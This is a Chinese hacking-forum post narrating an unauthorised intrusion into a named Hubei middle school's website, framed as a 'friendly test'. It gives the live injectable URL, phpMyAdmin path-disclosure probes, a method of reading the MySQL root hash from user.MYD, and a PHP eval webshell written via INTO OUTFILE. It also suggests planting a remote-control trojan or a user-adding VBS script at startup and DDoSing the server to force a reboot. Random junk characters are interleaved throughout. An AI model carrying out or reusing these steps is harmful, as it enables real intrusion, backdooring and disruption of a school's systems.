中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏% l  e8 u7 v+ C
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!! Z. _8 W$ y+ p( I( o5 i4 y. N
$ ?, Z  o" L/ N  X4 f7 |

% ^; O# U: \" Q  W7 u6 {8 l; N; ?) d7 ~1 d; C* O+ k
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
# h) ~0 m) J- x2 Y5 g0 t6 O/ l! u3 e7 }7 g4 O
那么想可以直接写入shell ,getshell有几个条件:
# G/ W9 L" L2 v6 T
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
3 l0 m; W0 Y$ F& j( i0 L* v* I+ Q  D! Y) T( k
试着爆绝对路径:
" f" u6 M; @3 O1./phpMyAdmin/index.php?lang[]=1  
8 i7 @4 [5 G% E: v  p+ {6 j( w2./phpMyAdmin/phpinfo.php  
+ E/ O5 J8 t8 z5 s3./load_file()  
, z$ \' ?% T  y1 h# O2 e4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5 I1 i( b# y0 g8 E6 l' j5./phpmyadmin/libraries/select_lang.lib.php  
5 Q8 ^( {9 _% x) a, H# K+ @4 n6./phpmyadmin/libraries/lect_lang.lib.php  : t# |: O& x' y, B: ?* L
7./phpmyadmin/libraries/mcrypt.lib.php   0 p/ Z+ s: D/ {6 d. ~1 X3 t
8./phpmyadmin/libraries/export/xls.php  
" k  w  z" d, A* j3 B0 {9 ?7 Z
1 [- I- D. J7 }% E& U' ~均不行...........................
: u' q3 a3 r7 M+ k
  _. l% V& a/ a% g御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
, P8 {& z, A8 H7 s# t+ V
! a) u- b+ }! [  H, ]: q( T权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
7 G9 D0 p. h4 O# w% ?
: I8 y8 F2 ?, u2 x9 _默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败( c  c! e6 b3 U1 O  O

1 s) E/ G! N3 C$ X- l敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........- b. i2 ^' y/ b3 T, d# @
0 h3 w2 h% E, }# X! t& [* y
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell " f3 @- F: N% U' @4 x) Q
+ S! v2 L# V7 O
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 7 ?6 V5 S6 S7 g: E

! `5 U, _9 P9 ~: h自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD + @+ q$ I' P& W# R
* i6 I+ n) e& i8 S4 Q! S# p! P6 f
成功读到root密码:" T8 u1 @7 Y  \) K& p

1 w. I; v# y" ^: W: R; `17---- r(0072)0 P1 O! s+ q$ E8 ^& s; F
18---- o(006f)
/ {) z1 U, b$ _( C19---- o(006f)
9 `) v. J8 K) s8 F20---- t(0074)6 V2 O' W% D0 A/ O
21---- *(002a)
2 e0 r. E# i8 R( P/ `* D* O22---- 8(0038)8 S" f/ G8 w* w) s) W; p; K( B& r( y$ m
23---- 2(0032)4 H4 r! Y2 r1 [0 s
24---- E(0045)
- r6 Q, e) Z' C* I1 n25---- 1(0031)
# @1 u% J2 w- W. d1 t# j26---- C(0043)
0 \# \0 N9 i, y' g  f27---- 5(0035)
/ U6 O8 s: T) r' l5 G' D28---- 8(0038)
7 @+ G. ^$ I$ Y5 a4 h29---- 2(0032)" c4 o9 o; M" u8 |, G, ~+ p0 A' j
30---- 8(0038)1 d% d1 N( _) e  S& G. V8 o
31---- A(0041)
9 S# Y5 v7 W; d! P- L- y  _32---- 9(0039)
8 w) Y8 t0 B& m2 y; H+ S8 Q2 j33---- B(0042)
2 S6 Y+ g$ v5 W4 o- w34---- 5(0035)- g/ b& w/ V  y4 H
35---- 4(0034)+ n' Y3 i- }8 L$ C' m( r/ A
36---- 8(0038)
$ O- K# h+ |! E* _% j3 _, X! H% v37---- 6(0036); U% L* n* e, I1 z2 [& `+ \
38---- 4(0034): S8 H: m+ ]- ]
39---- 9(0039)' |) h& ?) [7 }% E! b! K
40---- 1(0031)
& B/ `- F9 g0 O+ `+ D4 O41---- 1(0031)+ X" ^, j' e4 }
42---- 5(0035)
, f6 s: o5 B5 W' a; }43---- 3(0033)
/ `  o# S! G  ~; c44---- 5(0035). \* ?: C. w- t0 P' b' }
45---- 9(0039)  p6 K" J/ x; [8 P% V( u
46---- 8(0038)' R! S& }! i+ J2 C  m; F) i- o
47---- F(0046)
- g6 Z" ^: s8 q3 z; D4 U48---- F(0046)7 f" d' O# r# S
49---- 4(0034)
# \3 H( E. Q8 J+ w+ [( q50---- F(0046), _3 Z; w) p3 F  s' e2 Q
51---- 0(0030)5 k& v3 D0 ?  m# W
52---- 3(0033)
/ x+ P; q8 x7 O2 n0 A. I1 t53---- 2(0032)
/ A) E+ k8 q( y7 }0 i54---- A(0041)
! |$ F* h! \* t7 J5 w$ n55---- 4(0034)
% B* a6 V2 \: p' V! t6 v9 c, g4 s56---- A(0041)0 }9 g) _; D- U' i
57---- B(0042)+ K4 E3 O5 H2 s
58---- *(0044)
3 f+ u. L7 J, K, E6 M% V59---- *(0035)3 w) s0 U/ I4 o$ b& ~* R' |
60---- *(0041)
% S9 ]) v& \6 e61---- *0032). k8 A: h% G+ r$ J. B
* M) h# i* z' p8 V8 c& ~
解密后成功登陆phpmyamin
' A8 N( W9 U7 {3 U5 P; l3 D4 u8 X) M                          1 h5 s# N$ N9 t4 ?# }

* [5 ~; J, B% V                             [attach]164[/attach]: X: m8 i' L( @
2 ]/ m% y* R8 ]5 N6 ^. ~( |- c
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: U( D0 q1 Z7 }# d/ Q
; s/ Q/ |1 Z2 D# F4 v' Y* C成功执行,拿下shell,菜刀连接:
; j/ L0 A$ \5 o! W
, h' `" D2 Y/ b% U8 e服务器不支持asp,aspx,php提权无果...................
! |! L3 e! D) V1 b" i, y% I) R, R9 b# F& u% t0 r
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
- v/ \- Q  O  b8 b# Q2 a
服务器上已经有个隐藏帐号了

, Y- ^6 I/ l8 k7 N6 s
别名     administrators
) B+ R4 y$ J+ \  ~1 Z2 N注释     管理员对计算机/域有不受限制的完全访问权

: x% E) J0 @- F  m6 Z
成员

' e( b+ Z7 t* J+ s/ c! {# T- T. f) \
-------------------------------------------------------------------------------
# Z+ ^/ c8 S1 L& oadmin
6 Q1 r: ^  T: `# h# ?' JAdministrator7 U+ O- |; u& |9 v1 N# Y
slipper$
5 ]+ i7 Y" Z8 ?4 j9 {, }sqluser
( E3 X: Z+ L5 E7 }' W命令成功完成。 4 v- @% L3 h& X- b
, k6 ^4 ~  \! Q) v
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
+ ~' E( X' Q) v+ f/ `0 \! w' _( G' x6 S( s/ i" {
ddos服务器重启,不然就只能坐等服务器重启了...............................
4 e% n( ?; R2 ^" c, a
& j5 M9 W" h# s$ Q      
/ |% V" X/ z2 F: L. e& `' m

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2